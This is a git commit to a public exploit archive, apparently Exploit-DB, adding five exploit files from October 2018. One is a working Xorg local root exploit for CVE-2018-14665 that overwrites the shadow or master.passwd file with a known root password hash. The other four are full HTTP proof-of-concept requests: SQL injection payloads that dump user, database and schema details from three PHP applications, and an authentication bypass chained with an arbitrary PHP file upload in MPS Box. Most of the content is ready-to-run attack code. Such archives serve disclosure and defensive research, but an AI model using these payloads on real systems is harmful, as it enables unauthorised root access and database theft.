DB: 2018-10-27

5 changes to exploits/shellcodes xorg-x11-server < 1.20.3 - Local Privilege Escalation Quick Count 2.0 - 'txtInstID' SQL Injection MPS Box 0.1.8.0 - Arbitrary File Upload Delta Sql 1.8.2 - 'id' SQL Injection Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection
2018-10-27 05:01:46 +00:00 · 2018-10-27 05:01:46 +00:00 · bbbf700308
commit bbbf700308
parent 832a222df4
6 changed files with 392 additions and 0 deletions
--- a/exploits/multiple/local/45697.txt
+++ b/exploits/multiple/local/45697.txt
@ -0,0 +1,29 @@
+#CVE-2018-14665 - a LPE exploit via http://X.org  fits in a tweet
+
+cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su
+
+Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
+
+
+
+
+
+#!/bin/sh
+# local privilege escalation in X11 currently
+# unpatched in OpenBSD 6.4 stable - exploit
+# uses cve-2018-14665 to overwrite files as root. 
+# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
+# and vulnerable in default OpenBSD.
+#
+# - https://hacker.house
+echo [+] OpenBSD 6.4-stable local root exploit
+cd /etc
+Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
+sleep 5
+pkill Xorg
+echo [-] dont forget to mv and chmod /etc/master.passwd.old back 
+echo [+] type 'Password1' and hit enter for root
+su -
+
+
+EBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
--- a/exploits/php/webapps/45698.txt
+++ b/exploits/php/webapps/45698.txt
@ -0,0 +1,83 @@
+# Exploit Title: Quick Count 2.0 - 'txtInstID' SQL Injection
+# Dork: N/A
+# Date: 2018-10-25
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://quickcount.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/quickcount/files/latest/download
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/QCVote.php
+# 
+# [PATH]/QCVote.php
+# ....
+# 90  $_SESSION['glbInstID'] = "";
+# 91  if ($_SERVER["REQUEST_METHOD"] == "POST") {
+# 92  // collect value of input field
+# 93  if (isset($_REQUEST['txtInstID'])) {
+# 94  $name = $_REQUEST['txtInstID'];           
+# 95  }
+# 96  if (isset($_REQUEST['btnA'])) {
+# 97  $btnAVal = $_REQUEST['btnA'];
+# 98  }
+# 99  if (isset($_REQUEST['btnB'])) {
+# 100               $btnBVal = $_REQUEST['btnB'];
+# 101               }
+# 102 if (isset($_REQUEST['btnC'])) {
+# 103 $btnCVal = $_REQUEST['btnC'];
+# 104 }
+# 105 if (isset($_REQUEST['btnD'])) {
+# 106 $btnDVal = $_REQUEST['btnD'];
+# 107 }
+# 108 if (isset($_REQUEST['btnE'])) {
+# 109 $btnEVal = $_REQUEST['btnE'];
+# 110 }
+# ....
+# 
+
+POST /[PATH]/QCVote.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 268
+txtInstID=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'
+HTTP/1.1 200 OK
+Date: Thu, 25 Oct 2018 16:35:16 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=q360l936bjohek90ekaj85b0r4; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 5976
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/QCAdmin.php
+# 
+# [PATH]/QCAdmin.php
+
+Post/txtLogID=&txtLogPW=&txtSC=&txtExpDt=&txtSchName=&txtDept=&btnLogin=Login&txtInstClr=&txtLoginout=LoggedOUT
+
+# ....
+#201 if ($_SERVER["REQUEST_METHOD"] == "POST") {
+#202 // collect value of input field
+#203 if (isset($_REQUEST['txtLogID'])) {
+#204 $txtLogIDVal = $_REQUEST['txtLogID'];
+#205 $_SESSION['glbLogID']=$txtLogIDVal;           
+#206 }
+#207 if (isset($_REQUEST['txtLogPW'])) {
+#208 $txtLogPWVal = $_REQUEST['txtLogPW'];
+#209 $_SESSION['glbLogPW'] = $txtLogPWVal;
+# ....Etc....
--- a/exploits/php/webapps/45699.txt
+++ b/exploits/php/webapps/45699.txt
@ -0,0 +1,130 @@
+# Exploit Title: MPS Box 0.1.8.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-25
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.mpsbox.com/
+# Software Link: https://sourceforge.net/projects/mpsbox/files/latest/download
+# Version: 0.1.8.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/device_add.php
+# 
+# http://localhost/[PATH]/tmp/[FILE]
+# 
+# [PATH]/device_add.php
+# ....
+# 51 if(isset($_POST['upload'])) {
+# 52 
+# 53 $uploaddir = realpath(dirname(__FILE__)) . '/tmp/';
+# 54 $uploadfile = $uploaddir . basename($_FILES['files_to_upload']['name']);
+# 55 
+# 56 if (move_uploaded_file($_FILES['files_to_upload']['tmp_name'], $uploadfile)) {
+# 57 //	$_SESSION['status'] = "File is valid, and was successfully uploaded.\n";
+# 58 
+# 59 	$file_handle = fopen($uploadfile, "r");
+# 60 	while (!feof($file_handle) ) {
+# 61 	$line_of_text = fgetcsv($file_handle, 1024);
+# 62 	if(!empty($line_of_text[0])) {
+# 63 	device_queue_add('new','',"$line_of_text[0]","$line_of_text[1]",'','1');
+# 64 	}
+# 65 	}
+# ....
+
+POST /[PATH]/login_page.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/[PATH]/login_page.php
+Cookie: PHPSESSID=c1lc3729cfh58b72udo055urg7
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 85
+username=%27or+1%3D1+or+%27%27%3D%27&password=%27or+1%3D1+or+%27%27%3D%27&login=Login
+HTTP/1.1 302 Found
+Date: Thu, 25 Oct 2018 13:34:44 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: http://localhost/[PATH]/device_add.php
+Content-Length: 5652
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+
+POST http://localhost/[PATH]/device_add.php HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=c1lc3729cfh58b72udo055urg7
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=
+---------------------------20568543311864623172004480142
+Content-Length: 509
+-----------------------------20568543311864623172004480142
+Content-Disposition: form-data; name="files_to_upload"; filename="phpinfo.php"
+Content-Type: application/force-download
+<?php
+phpinfo();
+?>
+-----------------------------20568543311864623172004480142
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+100000
+-----------------------------20568543311864623172004480142
+Content-Disposition: form-data; name="upload"
+Upload
+-----------------------------20568543311864623172004480142--
+HTTP/1.1 302 Found
+Date: Thu, 25 Oct 2018 13:35:07 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: device_upd.php
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+
+GET http://localhost/[PATH]/tmp/phpinfo.php HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=c1lc3729cfh58b72udo055urg7
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 25 Oct 2018 13:35:38 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+
+<html>
+<body>
+<form class="form_nontbl" action="http://localhost/[PATH]/device_add.php" enctype="multipart/form-data" method="POST">
+<label>Select file</label><br>
+<input name="files_to_upload" type="file"><br>
+<a href="/inc/printers.csv">CSV file template</a>
+<label>&nbsp;</label><br>
+<input name="MAX_FILE_SIZE" value="100000" type="hidden">
+<input accept="csv" class="button alt2" name="upload" value="Upload" type="submit">
+</form>
+</body>
+</html>
--- a/exploits/php/webapps/45700.txt
+++ b/exploits/php/webapps/45700.txt
@ -0,0 +1,59 @@
+# Exploit Title: Delta Sql 1.8.2 - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-25
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://deltasql.sourceforge.net/
+# Software Link: https://sourceforge.net/projects/deltasql/files/latest/download
+# Software Link: http://deltasql.sourceforge.net/deltasql/
+# Version: 1.8.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/docs_manage.php?id=[SQL]&version=1&hasdocs=1
+ 
+GET /[PATH]/docs_manage.php?id=1++uNiOn+seleCt+0x31,0x32,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),0x34,0x35--+-&version=1&hasdocs=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 24 Oct 2018 00:12:57 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/list_project_modules.php?id=[SQL]&name=1
+ 
+GET /[PATH]/list_project_modules.php?id=-1%20union%20select%20null,(0x32),null--&name=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 24 Oct 2018 00:08:03 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 2150
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
--- a/exploits/php/webapps/45701.txt
+++ b/exploits/php/webapps/45701.txt
@ -0,0 +1,86 @@
+# Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection
+# Dork: N/A
+# Date: 2018-10-25
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://vetclinic.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download
+# Version: 00.02
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/petmaint.php?editpetnum=[SQL]
+# 
+# [PATH]/petmaint.php
+# ....
+#154 $editpetnum = "";
+#155 
+#156 if(isset($_POST["editpetnum"])) {
+#157      $editpetnum = $_POST["editpetnum"];
+#158      unset($_POST["editpetnum"]);
+#159 }
+#160 else if(isset($_GET["editpetnum"])) {
+#161      $editpetnum = $_GET["editpetnum"];
+#162      unset($_GET["editpetnum"]);
+#163 }
+# ....
+ 
+GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 25 Oct 2018 22:18:01 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/procmaint.php?proccode=[SQL]
+# 
+# [PATH]/procmaint.php
+# ....
+#28 require_once "includes/common.inc";
+#29 $emplnumber = $_SESSION['employeenumber'];
+#30 $display = "ProcMaint:".$emplnumber;
+#31 if(isset($_GET["proccode"])) {
+#32      $proccode = $_GET["proccode"];
+#33 } else {
+#34      $proccode = "";
+#35 }
+#36 if ($proccode == "")
+#37 {
+# ....
+ 
+GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 25 Oct 2018 22:22:33 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 2697
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10053,6 +10053,7 @@ id,file,description,date,author,type,platform,port
 45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows,
 45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86,
 45696,exploits/windows/local/45696.rb,"WebEx - Local Service Permissions Exploit (Metasploit)",2018-10-25,Metasploit,local,windows,
+45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40209,3 +40210,7 @@ id,file,description,date,author,type,platform,port
 45691,exploits/php/webapps/45691.txt,"AjentiCP 1.2.23.13 - Cross-Site Scripting",2018-10-25,"Numan OZDEMIR",webapps,php,
 45692,exploits/php/webapps/45692.txt,"MPS Box 0.1.8.0 - 'uuid' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80
 45693,exploits/php/webapps/45693.txt,"Open STA Manager 2.3 - Arbitrary File Download",2018-10-25,"Ihsan Sencan",webapps,php,
+45698,exploits/php/webapps/45698.txt,"Quick Count 2.0 - 'txtInstID' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
+45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php,
+45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
+45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,